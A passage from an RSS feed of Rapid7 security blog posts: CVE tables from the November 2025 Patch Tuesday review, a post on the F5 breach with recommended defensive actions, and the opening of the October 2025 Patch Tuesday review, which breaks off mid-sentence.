href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62220">CVE-2025-62220</a></td><td><p>Windows Subsystem for Linux GUI Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12863">CVE-2025-12863</a></td><td><p>Libxml2: namespace use-after-free in xmlsettreedoc() function of libxml2</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64433">CVE-2025-64433</a></td><td><p>KubeVirt Arbitrary Container File Read</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40107">CVE-2025-40107</a></td><td><p>can: hi311x: fix null pointer dereference when resuming from sleep before interface was enabled</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60753">CVE-2025-60753</a></td><td><p>An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-12875">CVE-2025-12875</a></td><td><p>mruby array.c ary_fill_exec out-of-bounds write</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64435">CVE-2025-64435</a></td><td><p>KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64437">CVE-2025-64437</a></td><td><p>KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64434">CVE-2025-64434</a></td><td><p>KubeVirt Improper TLS Certificate Management Handling Allows API Identity Spoofing</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64432">CVE-2025-64432</a></td><td><p>KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40109">CVE-2025-40109</a></td><td><p>crypto: rng - Ensure set_ent is always present</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-52881">CVE-2025-52881</a></td><td><p>runc: LSM labels can be bypassed with malicious config using dummy procfs files</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-31133">CVE-2025-31133</a></td><td><p>runc container escape via "masked path" abuse due to mount race conditions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-52565">CVE-2025-52565</a></td><td><p>container escape due to /dev/console mount and related races</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64436">CVE-2025-64436</a></td><td><p>KubeVirt Excessive Role Permissions Could Enable Unauthorized VMI Migrations Between Nodes</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>Other vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30398">CVE-2025-30398</a></td><td><p>Nuance PowerScribe 360 Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr></tbody></table><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59499">CVE-2025-59499</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>System Center vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47179">CVE-2025-47179</a></td><td><p>Configuration Manager Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59511">CVE-2025-59511</a></td><td><p>Windows WLAN Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60713">CVE-2025-60713</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60718">CVE-2025-60718</a></td><td><p>Windows Administrator Protection Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60721">CVE-2025-60721</a></td><td><p>Windows Administrator Protection Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60707">CVE-2025-60707</a></td><td><p>Multimedia Class Scheduler Service (MMCSS) Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60710">CVE-2025-60710</a></td><td><p>Host Process for Windows Tasks Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59507">CVE-2025-59507</a></td><td><p>Windows Speech Runtime Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59508">CVE-2025-59508</a></td><td><p>Windows Speech Recognition Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62215">CVE-2025-62215</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Yes</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59515">CVE-2025-59515</a></td><td><p>Windows Broadcast DVR User Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60717">CVE-2025-60717</a></td><td><p>Windows Broadcast DVR User Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62218">CVE-2025-62218</a></td><td><p>Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62219">CVE-2025-62219</a></td><td><p>Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60716">CVE-2025-60716</a></td><td><p>DirectX Graphics Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60708">CVE-2025-60708</a></td><td><p>Storvsp.sys Driver Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60723">CVE-2025-60723</a></td><td><p>DirectX Graphics Kernel Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59509">CVE-2025-59509</a></td><td><p>Windows Speech Recognition Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62208">CVE-2025-62208</a></td><td><p>Windows License Manager Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62209">CVE-2025-62209</a></td><td><p>Windows License Manager Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60706">CVE-2025-60706</a></td><td><p>Windows Hyper-V Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724">CVE-2025-60724</a></p></td><td><p>GDI+ Remote Code Execution Vulnerability</p></td><td><p>Yes</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><h3>Windows ESU vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62452">CVE-2025-62452</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60715">CVE-2025-60715</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60720">CVE-2025-60720</a></td><td><p>Windows Transport Driver Interface (TDI) Translation Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59505">CVE-2025-59505</a></td><td><p>Windows Smart Card Reader Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60703">CVE-2025-60703</a></td><td><p>Windows Remote Desktop Services Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60714">CVE-2025-60714</a></td><td><p>Windows OLE Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60709">CVE-2025-60709</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60705">CVE-2025-60705</a></td><td><p>Windows Client-Side Caching Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59514">CVE-2025-59514</a></td><td><p>Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59512">CVE-2025-59512</a></td><td><p>Customer Experience Improvement Program (CEIP) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60704">CVE-2025-60704</a></td><td><p>Windows Kerberos Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60719">CVE-2025-60719</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62217">CVE-2025-62217</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62213">CVE-2025-62213</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59506">CVE-2025-59506</a></td><td><p>DirectX Graphics Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59510">CVE-2025-59510</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59513">CVE-2025-59513</a></td><td><p>Windows Bluetooth RFCOM Protocol Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724">CVE-2025-60724</a></p></td><td><p>GDI+ Remote Code Execution Vulnerability</p></td><td><p>Yes</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><h3>Windows Microsoft Office ESU vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-60724">CVE-2025-60724</a></td><td><p>GDI+ Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr></tbody></table><p></p><h2>Updates</h2><ul><li><strong>2025-11-11</strong>: clarified the description of CVE-2025-62214.</li><li><strong>2025-12-19</strong>: correction to known exploitation status of CVE-2025-60724.</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-november-2025</link>
      <guid isPermaLink="false">blt9e3a3fa632360aea</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 11 Nov 2025 20:58:18 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Inside the F5 Breach: What We Know and Recommended Actions]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>On October 15, 2025, F5 Networks </span><a href="https://my.f5.com/manage/s/article/K000154696"><span style='font-size: undefined;'>disclosed</span></a><span style='font-size: undefined;'> a breach attributed to a sophisticated nation-state actor. In an </span><a href="https://www.sec.gov/Archives/edgar/data/1048695/000104869525000149/ffiv-20251015.htm"><span style='font-size: undefined;'>SEC 8-K form</span></a><span style='font-size: undefined;'> also filed that same day, F5 confirmed unauthorized access to its internal development and knowledge-management systems dating back to August 9, 2025. Some source-code and vulnerability-related materials were exfiltrated, though F5 states it found no evidence of modified software builds or supply chain compromise. F5 released an </span><a href="https://my.f5.com/manage/s/article/K000154696"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> of the incident. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 has conducted an internal investigation and is not impacted by this incident. As part of our due diligence, we are also monitoring the situation with our third-party vendors.  </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>All known detections have been implemented across the Rapid7 portfolio, and threat hunts across our MDR customer base are being rolled out proactively.  Further details are provided below, and this publication will be updated as new information becomes available. </span></p><h2><span style='color:rgb(67, 67, 67);'>Scope and investigation</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>F5 commissioned independent assessments by </span><a href="https://raw.githubusercontent.com/askf5/K000154696/main/IOActive_Security_Review_2025_Attestation_Letter.pdf"><span style='font-size: undefined;'>IOActive</span></a><span style='font-size: undefined;'> and </span><a href="https://raw.githubusercontent.com/askf5/K000154696/main/NCC_Group_Bedrock_Letter_of_Engagement_Oct_10_2025_1.pdf"><span style='font-size: undefined;'>NCC Group</span></a><span style='font-size: undefined;'>. Both parties confirmed no tampering in build pipelines or release artifacts had occurred.</span></p><h2><span style='color:rgb(67, 67, 67);'>Connection to BRICKSTORM</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Public </span><a href="https://www.bloomberg.com/news/articles/2025-10-16/potentially-catastrophic-breach-of-cyber-firm-blamed-on-china"><span style='font-size: undefined;'>reporting</span></a><span style='font-size: undefined;'> has linked the F5 breach with the BRICKSTORM malware family, based on customer communications from F5. Mandiant’s BRICKSTORM </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span style='font-size: undefined;'>report</span></a><span style='font-size: undefined;'> links the adversary to campaigns targeting software and cloud vendors to harvest source code and credentials for downstream supply-chain exploitation. </span></p><h2><span style='color:rgb(67, 67, 67);'>CISA and NCSC actions</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Following coordinated disclosure, CISA issued </span><a href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices"><span style='font-size: undefined;'>Emergency Directive 26-01</span></a><span style='font-size: undefined;'> instructing federal agencies to audit and patch affected F5 systems, while the </span><a href="https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network"><span style='font-size: undefined;'>UK NCSC</span></a><span style='font-size: undefined;'> confirmed compromise of F5 development infrastructure and is advising UK operators to validate firmware and signatures.</span></p><h2><span style='color:rgb(67, 67, 67);'>Patch cycle and clarification</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>F5 emphasized that its </span><a href="https://my.f5.com/manage/s/article/K000156572"><span style='font-size: undefined;'>October 2025 quarterly patches</span></a><span style='font-size: undefined;'> — released the same day as the SEC filing — are unrelated to the breach, and part of its regular maintenance cadence. However F5 is strongly advising customers to apply the patches, which remediate 44 newly disclosed vulnerabilities, as soon as possible. This is due to the context of the breach, whereby the threat actor was able to learn sensitive information on previously undisclosed vulnerabilities, which may give the attacker a tactical advantage in terms of leveraging these vulnerabilities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 InsightVM and Nexpose customers will have coverage for all the vulnerabilities affecting BIG-IP (all modules), BIG-IP APM, BIG-IP AFM, BIG-IP ASM and BIG-IP PEM in the October 16, 2025 content release.</span></p><h2><span style='color:rgb(67, 67, 67);'>The Rapid7 Labs perspective</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>The Rapid7 Labs research team assesses that, while there is no evidence of active exploitation of undisclosed F5 vulnerabilities, the compromise of internal development systems represents a long-tail risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Adversaries with access to proprietary source code or vulnerability research may attempt to identify latent weaknesses in future operations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 Labs continues to track the BRICKSTORM cluster and any follow-on exploitation of network-edge technologies derived from this intrusion. We will update customers as new intelligence emerges and share it through Intelligence Hub. </span></p><h2><span style='color:rgb(67, 67, 67);'>What you should do now</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations using F5 technologies should take immediate, prioritized action to validate the integrity of their environments and reduce potential exposure stemming from this incident.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>1. Identify and assess your footprint</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Inventory all deployed F5 assets — including hardware appliances, software instances, and virtualized deployments.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Determine whether any of these systems provide remote management access or administrative interfaces that are reachable from the public internet.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>2. Restrict management exposure and validate configurations</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>F5 management interfaces should never be internet-facing. If external exposure is detected, assume potential compromise and conduct a focused assessment of logs, configurations, and credentials.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Implement F5’s published hardening guidance and align configurations with vendor best practices for access control, authentication, and telemetry.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>3. Apply updates and replace unsupported systems</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Immediately install the </span><a href="https://my.f5.com/manage/s/article/K000156572"><span style='font-size: undefined;'>latest F5 security updates</span></a><span style='font-size: undefined;'> released in October 2025.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Retire or replace any F5 products that have reached end-of-support, as these devices will not receive future security fixes.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>4. Enhance monitoring and detection coverage</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Conduct continuous monitoring and proactive threat hunting for anomalous activity related to management logins, credential use, and system modifications.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>5. Report and coordinate if compromise is suspected</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>If indicators of compromise or unauthorized access are detected, </span><a href="https://www.f5.com/support/security-incident-response-team-sirt"><span style='font-size: undefined;'>contact</span></a><span style='font-size: undefined;'> F5’s Security Incident Response Team (SIRT) for coordinated remediation.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Engage your national cybersecurity authority or incident response partner where applicable.</span></p></li></ul><h2><span style='color:rgb(67, 67, 67);'>How Rapid7 is supporting customers</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>At present there are no known exploited CVEs associated with the disclosure. Rapid7 has implemented honeypot sensors to detect if exploitation of affected F5 products does begin. In addition, we are undertaking the following measures for our customers.</span></p><h3><span style='color:rgb(102, 102, 102);'>Vulnerability management</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Vulnerability Management (InsightVM and Nexpose) customers that run F5 BIG-IP models will be able to assess exposure to the vulnerabilities affecting BIG-IP (all modules), BIG-IP APM, BIG-IP AFM, BIG-IP ASM and BIG-IP PEM, with vulnerability checks available in the October 16 content release.</span></p><h3><span style='color:rgb(102, 102, 102);'>MDR and IDR customers</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 has proactively updated our threat detection capabilities in response to this threat. Our Threat Intelligence and MDR teams have launched targeted hunts for IOCs related to BRICKSTORM and are continuously refining our detection rules to identify these attacks early.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Process - BRICKSTORM targets U.S. Tech and Legal sectors with Stealthy Espionage</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Network Connection - BRICKSTORM targets U.S. Tech and Legal sectors with Stealthy Espionage</span></p></li></ul><p style="direction: ltr;">The Rapid7 MDR team has completed all threat hunts utilizing the available indicators of compromise (IOCs) and did not find any indications of customer exposure. Threat hunting will continue in an effort to identify new activity.</p><h3><span style='color:rgb(102, 102, 102);'>Intelligence Hub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding the F5 breach and associated indicators.</span></p><h2>Updates</h2><ul><li><span style='font-size: undefined;'><strong>Oct 17, 20925:</strong></span><span style='font-size: undefined;'> Updated the Vulnerability management section to confirm that VM checks were successfully shipped on Oct 16.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/ve-inside-the-f5-breach-what-we-know-and-recommended-actions</link>
      <guid isPermaLink="false">blt7a5f189dd73e493f</guid>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Emerging Threats]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 16 Oct 2025 17:53:18 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - October 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is publishing 172 new vulnerabilities today. Microsoft is aware of public disclosure for just two of the vulnerabilities published today, and claims no evidence of in-the-wild exploitation. Today sees six zero-day vulnerabilities patched, but only a single one is evaluated as critical severity. Microsoft is aware of public disclosure in three cases, and exploitation in the wild in the remaining three. Today’s release includes the publication of five further critical remote code execution (RCE) vulnerabilities, although Microsoft expects that only one is likely to see exploitation. 14 browser vulnerabilities and a significant array of fixes for Azure Linux (aka Mariner) have already been published separately this month, and are not included in the total. Alongside older versions of Exchange and Office, the behemoth that is Windows 10 receives its final security patches today, although there are some exceptions.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>TPM 2.0: zero-day information disclosure</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>When the Trusted Computing Group (TCG) consortium’s TPM 2.0 reference implementation contains a flaw, under normal circumstances that flaw is likely to be replicated in the downstream implementation by each manufacturer. That is the case with </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-2884"><span style='font-size: undefined;'>CVE-2025-2884</span></a><span style='font-size: undefined;'>, an information disclosure vulnerability which Microsoft is treating as a zero day despite the curious circumstance that Microsoft is a founder member of TCG, and thus presumably privy to the discovery before its publication. Windows 11 and newer versions of Windows Server receive patches. In place of patches, admins for older Windows products such as Windows 10 and Server 2019 receive another implicit reminder that Microsoft would strongly prefer that everyone upgrade.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Remote Access Connection Manager: zero-day EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Local elevation of privilege (EoP) is always attractive to an attacker, since even if it doesn’t get them where they need to be, it can provide an important link in the chain. Microsoft is already aware of exploitation in the wild for </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59230"><span style='font-size: undefined;'>CVE-2025-59230</span></a><span style='font-size: undefined;'>, a vulnerability in the Windows Remote Access Connection Manager. With no user interaction required, this will go straight into an attacker’s standard toolkit. There’s very little information in the advisory itself, but someone out there knows exactly how to exploit this vulnerability. Credit where credit is due: Microsoft detected the exploitation, and now we have patches for all supported versions of Windows.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Agere fax modem driver: pair of zero-day EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Are you a doctor, a lawyer, or a hipster? If so, you might be one of the holdouts who still feels the need to connect a fax machine to a computer, and you should brace yourself for some bad news, then some good news, and then some more bad news. For starters, Microsoft has published two zero-day vulnerabilities in the Agere Modem driver: </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24052"><span style='font-size: undefined;'>CVE-2025-24052</span></a><span style='font-size: undefined;'>, which is publicly disclosed, and </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24990"><span style='font-size: undefined;'>CVE-2025-24990</span></a><span style='font-size: undefined;'>, which has already been exploited in the wild. The vulnerable driver ships with every version of Windows, up to and including Server 2025. Maybe your fax modem uses a different chipset, and so you don’t need the Agere driver? Perhaps you’ve simply discovered email? Tough luck. Your PC is still vulnerable, and a local attacker with a minimally privileged account can elevate to administrator. The good news is that Microsoft is 